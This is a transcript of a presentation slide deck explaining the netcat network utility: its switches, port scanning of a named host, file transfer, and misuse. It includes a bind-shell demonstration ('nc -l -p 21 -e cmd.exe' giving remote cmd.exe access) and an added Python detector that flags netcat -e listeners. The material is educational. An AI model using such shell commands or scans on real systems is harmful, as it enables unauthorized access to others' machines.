8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02

netcat

Upload: anand-nandani

Post on 19-Feb-2017


Category: Engineering



TRANSCRIPT

Page 1

netcat

Page 2

Purpose of Presentation…?

• Analyze the network
• Identify the network security issues

How to do it …?

• First step: research the network

Page 3

Tools for Research

• Information gathering tools
• Forensic tools
• Network utility tools
• Password auditing tools
• Recovery and restoration tools
• Vulnerability scanning & analysis tools

Page 4

What is netcat?

• Swiss Army Knife of Network
• A versatile network utility tool
• Uses TCP and UDP protocols
• Designed as a backend tool
  • Can be used directly
  • Driven by other programs

Page 5

Power of netcat

• Can create outbound or inbound connections, TCP or UDP, to or from any ports
• Full DNS forward/reverse checking
• Can use any local port
• Can use any locally configured network address
• Port scanning with randomizer
• Option to let another program service established connections
• Optional telnet responder

Page 6

How do I use netcat?

• General form of usage is:
    nc [switches] [hostname] [portnumber]
• Simplest usage would be:
    nc -v www.msn.com 80
  then use the GET method:
    GET / HTTP/1.0
• Hostname can be a name or an IP address

Page 7

Use of -n switch

• If not specified, netcat performs forward and reverse DNS lookups
• Reports the problem of mismatched names in DNS

    D:\tools\nc>nc -v www.hotmail.com 80
    DNS fwd/rev mismatch: www.hotmail.com != hotmail.se
    DNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.com
    DNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.com
    www.hotmail.com [207.68.171.233] 80 (http) open

• If specified, netcat will take only an IP address as the hostname argument
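The forward/reverse check behind the mismatch warnings above, as an added example (not netcat's own code and not from the original slides): it resolves a name, reverse-resolves each address, and reports disagreements. The function names and the sample records (example.test names, 192.0.2.x addresses) are constructed for illustration.

```python
import socket

# Constructed sample records (documentation addresses, not real DNS data).
SAMPLE_A = {
    "www.example.test": ["192.0.2.10", "192.0.2.11"],
    "lb.cdn.example.test": ["192.0.2.11"],
}
SAMPLE_PTR = {
    "192.0.2.10": "www.example.test",
    "192.0.2.11": "lb.cdn.example.test",
}


def fwd_rev_check(host, forward=None, reverse=None):
    """Resolve host, reverse-resolve every address, report disagreements.

    forward(name) -> list of IPs and reverse(ip) -> name are injectable so the
    check can run on recorded data; by default the system resolver is used.
    """
    forward = forward or (lambda h: socket.gethostbyname_ex(h)[2])
    reverse = reverse or (lambda ip: socket.gethostbyaddr(ip)[0])
    findings = []
    for ip in forward(host):
        try:
            ptr = reverse(ip)
        except (KeyError, OSError):      # herror/gaierror are OSError subclasses
            findings.append((ip, "no reverse (PTR) record"))
            continue
        if ptr.rstrip(".").lower() != host.rstrip(".").lower():
            findings.append((ip, f"DNS fwd/rev mismatch: {host} != {ptr}"))
        # A PTR name is only meaningful if it resolves back to the same IP.
        try:
            confirmed = ip in forward(ptr)
        except (KeyError, OSError):
            confirmed = False
        if not confirmed:
            findings.append((ip, f"{ptr} does not resolve back to {ip}"))
    return findings


def check_sample(host):
    """Run the check against the constructed tables above (no network)."""
    return fwd_rev_check(host, SAMPLE_A.__getitem__, SAMPLE_PTR.__getitem__)
```

A mismatch is common behind load balancers and shared hosting, so it is a prompt to verify which host actually answered rather than proof of tampering.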

Page 8

Options

• -v: Controls the verbosity level
• -w <seconds>: Sets the network inactivity timeout
• -p <port number>: Binds the connection to a specific port number

Page 9

Options

• -o <file name>: To obtain a hexdump file of data sent either way
• -l: Makes netcat wait for inbound connections; once a connection is established, it transfers the data

Page 10

Interesting -l

• Can be used to create something like a listening netcat server
• On listening end:
    D:\tools\nc>nc -l -p 1234 < test.txt
• On client end:
    D:\tools\nc>nc 192.168.0.100 1234

Page 11

Options

• -L: Listen harder
• -r: Randomize port numbers
• -z: Zero-I/O mode [used in scanning]

Page 12

Options

• -e <program name>: Allows a program to be executed (dangerous)
• -d: Allows netcat to run in detached mode without a console window
• -u: Makes a UDP connection instead of a TCP connection

Page 13

Options

• -s <address>: Local source address
• -i <seconds>: Specifies the delay interval for lines sent or ports scanned
• -t: Answer telnet negotiation

Page 14

Put the Knife to Use

Use It GOOD

Use It BAD

Page 15

USE IT GOOD

Port Scanning

Find what is out there

• nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30

Page 16

    D:\tools\nc>nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30
    davinci.newcs.uwindsor.ca [137.207.76.3] 22 (?) open
    SSH-2.0-Sun_SSH_1.0
    davinci.newcs.uwindsor.ca [137.207.76.3] 28 (?) open
    davinci.newcs.uwindsor.ca [137.207.76.3] 20 (ftp-data) open
    davinci.newcs.uwindsor.ca [137.207.76.3] 23 (telnet) open
    internet2 proxy-telnet [v3.1] ready

     √☺Please enter your userid:
    davinci.newcs.uwindsor.ca [137.207.76.3] 24 (?) open
    davinci.newcs.uwindsor.ca [137.207.76.3] 30 (?) open
    davinci.newcs.uwindsor.ca [137.207.76.3] 25 (smtp) open
    220-Sendmail 8.6.12/8.6.12 ready on internet2
    220 ESMTP spoken here
    davinci.newcs.uwindsor.ca [137.207.76.3] 26 (?) open
    davinci.newcs.uwindsor.ca [137.207.76.3] 29 (?) open
    davinci.newcs.uwindsor.ca [137.207.76.3] 27 (?) open
    davinci.newcs.uwindsor.ca [137.207.76.3] 21 (ftp) open
    220- internet2 proxy-ftp [v3.1] ready
    220 Please enter your userid

    D:\tools\nc>

Page 17

USE IT GOOD

• Simple data transfer agent
  • Immaterial which side is server and which side is client
  • Input at one end goes as output to the other
• Hex dump feature
  • Can be used to analyze odd network protocols

Page 18

USE IT GOOD

• Performance testing
  • Generate a large amount of useless data on the network; with a server on one end and a client on the other, we can use it to test network performance.
• Protect your workstation's X server

Page 19

DARK SIDE

• Scanning for vulnerable services
  • Can use files as input to netcat and scan the system by using the -i and -r switches
• Can use the -e option to execute programs
• SYN-bombing
  • Can disable TCP servers

Page 20

EXAMPLE

• Listen on port 21 (FTP port) using netcat with the -e switch to execute cmd.exe
• FTP request made from a different machine to the listener machine

Page 21

RESULT

LISTENER

    D:\tools\nc>nc -l -p 21 -e cmd.exe

Request

    C:\Documents and Settings\RAJAT>ftp 192.168.0.100
    Connected to 192.168.0.100.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    D:\tools\nc>
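One way to spot the -e listener from the RESULT slide in process-creation logs, as an added example that is not part of the original slides: it parses netcat-style command lines using the switches listed on the Options slides and rates them. The function names, rating labels and sample command lines are assumptions constructed for illustration.

```python
import ntpath
import shlex

NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe"}
TAKES_VALUE = set("wpoesi")   # switches on the slides that consume an argument

def parse_nc_args(cmdline):
    """Return (program basename, {switch: value or True}) for a command line."""
    # En dashes pasted from slides or documents are read as "-".
    tokens = shlex.split(cmdline.replace("\u2013", "-"), posix=False) or [""]
    prog = ntpath.basename(tokens[0].strip('"')).lower()
    flags, i = {}, 1
    while i < len(tokens):
        tok, i = tokens[i], i + 1
        if len(tok) < 2 or not tok.startswith("-"):
            continue                      # hostname, port range, etc.
        for pos, ch in enumerate(tok[1:], start=1):
            if ch in TAKES_VALUE:
                value = tok[pos + 1:]     # glued form such as -p21
                if not value and i < len(tokens):
                    value, i = tokens[i], i + 1
                flags[ch] = value
                break
            flags[ch] = True              # plain switch, may be bundled (-Ld)
    return prog, flags

def classify(cmdline):
    """Rate one command line: 'high', 'review', 'info', or None if not netcat."""
    prog, flags = parse_nc_args(cmdline)
    if prog not in NETCAT_NAMES:
        return None
    if "e" in flags:
        return "high"                     # -e: a program is attached to the socket
    if "l" in flags or "L" in flags:
        return "review"                   # plain listener, e.g. a file transfer
    return "info"

# Constructed process-creation command lines, modelled on the slides.
SAMPLE_EVENTS = [
    r"D:\tools\nc\nc.exe -l -p 21 -e cmd.exe",
    "nc \u2013l -p 1234",
    "nc -v -w 5 -r host.example.test 20-30",
    r"C:\Windows\System32\ftp.exe 192.168.0.100",
    "nc.exe -Ldp 8080 -e cmd.exe",
]

def triage(events=SAMPLE_EVENTS):
    """Return (level, cmdline) pairs for the netcat events only."""
    return [(lvl, e) for e in events if (lvl := classify(e))]
```

The match is by program name and switches only, so it is a starting point for a log query rather than a complete detection.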

Page 22

Environment

Local Home Network

• ISP: Cogeco
• Three PCs
• OS: Windows XP
• Connected via DLink router
• Cat 5 connecting cables used

Page 23

Conclusion

• Netcat is a very useful network utility tool
• Very light but extremely effective
• Particularly when it can listen and execute programs when connection requests are made on the specific ports

Page 24

Credits

Chris Wysopal

Hobbit

www.atstake.com

Page 25

THANK YOU